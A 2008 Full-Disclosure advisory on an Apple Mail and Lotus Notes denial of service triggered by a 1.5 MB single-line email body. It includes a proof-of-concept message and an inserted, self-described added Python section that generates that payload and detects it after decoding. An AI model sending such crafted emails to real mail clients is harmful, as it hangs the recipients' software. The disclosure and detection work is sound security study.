Message-Id: <EB27A370-8013-4C37-AF64-709FEDE93D7B@davidwharton.us>
Date: Thu, 29 May 2008 19:31:39 -0500
From: David Wharton <security@...idwharton.us>
To: full-disclosure@...ts.grok.org.uk
Subject: Apple Mail Denial of Service Vulnerability (with bonus IBM Lotus Notes DoS!)


***Summary***

A maliciously crafted e-mail message can cause a denial of service in  
multiple versions of the Apple Mail email client.

***Scope***

Apple Mail version 3.1 (914/915)
Apple Mail version 3.2 (919/919.2)

Note: other versions of this product may be vulnerable as well; I have  
not tested them.  The vendor has been made aware of this issue and has  
chosen not to treat it as a security issue.

Interestingly enough, a similar issue seems to be present in multiple  
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z --  
http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611).  
The exploit provided in this advisory will also cause a denial of  
service condition on multiple versions of IBM Lotus Notes.  IBM has  
been kind enough to create SPR# PRAD7DPKLW to address the issue the  
exploit targets.

***Description***

An email message with a maliciously crafted body (in my tests I used a  
long line) can cause the e-mail client to hang, resulting in a denial  
of service condition.  Testing with emails whose body contains no  
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a single  
line of 1.5 MB can cause the email clients to hang for over half  
an hour.

Initial testing reveals the following:

In Apple Mail, the e-mail is rendered correctly in the preview pane  
but a subsequent click on a different e-mail causes the application to  
hang.

***Credits***

David Wharton

***References***

Apple Mail
http://www.apple.com/macosx/features/mail.html

***PoC Exploit***

Below is a sample e-mail with headers (some headers removed or  
modified) that causes the e-mail clients to hang as discussed.  Note  
that the body is one long line: the trailing "=" characters are  
quoted-printable soft line breaks (see the Content-Transfer-Encoding  
header) and are not part of the body; once decoded, most of the body  
is one long contiguous string of A's.

Subject: dos test
MIME-Version: 1.0
From: xxxxx@...xx.com
To: xxxxx@...xx.com
Date: xxxxx
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@...xx.com>
X-Mailer: xxxxx
MIME-Version: 1.0
Content-Type: text/html;
	charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0
X-CTASD-IP: xxx.xxx.xxx.xxx
X-CTASD-Sender: xxxxx@...xx.com
x-ctasd: uncategorized
x-ctasd-vod: uncategorized
x-ctasd-station:
X-OriginalArrivalTime: xxxxx@


<font size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
<snip> (removed a few thousand 'A's)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</font>N=
OTICE:  This e-mail message and all attachments transmitted with it may con=
tain confidential information intended solely for the use of the addressee.=
<br />=
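The following is an added example, not part of the original advisory: it rebuilds the PoC above with Python's standard email library (one text/html part, iso-8859-1, quoted-printable, body a single whitespace-free line of A's) and pairs it with the check a mail gateway would need to catch it. The sender and recipient addresses are constructed (the advisory masks the real ones), and the function names are my own. The detection side decodes the transfer encoding before measuring, because quoted-printable soft line breaks keep every encoded line under the RFC 5322 998-byte limit while the decoded line is still 1.5 MB long; a filter that measures raw line length never sees it.

```python
"""Generate the long-line PoC message and detect it after transfer decoding."""
import email
import re
from email import policy
from email.mime.text import MIMEText

# Constructed addresses; the advisory masks the real ones as xxxxx.
SENDER = "sender@example.test"
RECIPIENT = "victim@example.test"


def build_long_line_message(length: int = 1_500_000) -> MIMEText:
    """Return a text/html message whose decoded body is one line of `length`
    'A's containing no 0x0A, 0x0D or 0x20 bytes, mirroring the advisory's PoC.

    MIMEText selects quoted-printable for iso-8859-1, so the *encoded* wire
    form is split into 76-column lines ending in '=' (soft line breaks),
    exactly as in the sample; the decoded body remains a single line.
    """
    body = '<font size="2">' + "A" * length + "</font>"
    msg = MIMEText(body, "html", "iso-8859-1")
    msg["Subject"] = "dos test"
    msg["From"] = SENDER
    msg["To"] = RECIPIENT
    return msg


def longest_whitespace_free_run(raw: bytes) -> int:
    """Longest run of bytes with no space/tab/CR/LF in any decoded text part.

    Decoding first is the point: each encoded quoted-printable line is short
    and RFC 5322 compliant, so only the decoded payload reveals the real line.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    worst = 0
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        payload = part.get_payload(decode=True)  # undoes quoted-printable / base64
        if not payload:
            continue
        tokens = re.split(rb"[ \t\r\n]+", payload)
        worst = max(worst, max(len(t) for t in tokens))
    return worst


def exceeds_decoded_line_limit(raw: bytes, limit: int = 998) -> bool:
    """True if any decoded text part holds a whitespace-free run longer than
    `limit` bytes (default: the RFC 5322 line-length limit)."""
    return longest_whitespace_free_run(raw) > limit


if __name__ == "__main__":
    raw = build_long_line_message().as_bytes()
    print("encoded message size:", len(raw), "bytes")
    print("longest decoded whitespace-free run:", longest_whitespace_free_run(raw))
    print("flagged:", exceeds_decoded_line_limit(raw))
```

Run as a script it builds the full 1.5 MB variant; to reproduce the sample on the wire, write `raw` to a file and feed it to the client under test. The 998-byte threshold is a conservative default; the advisory only establishes that 1.5 MB triggers the hang, so tune the limit to what your clients actually tolerate.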

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
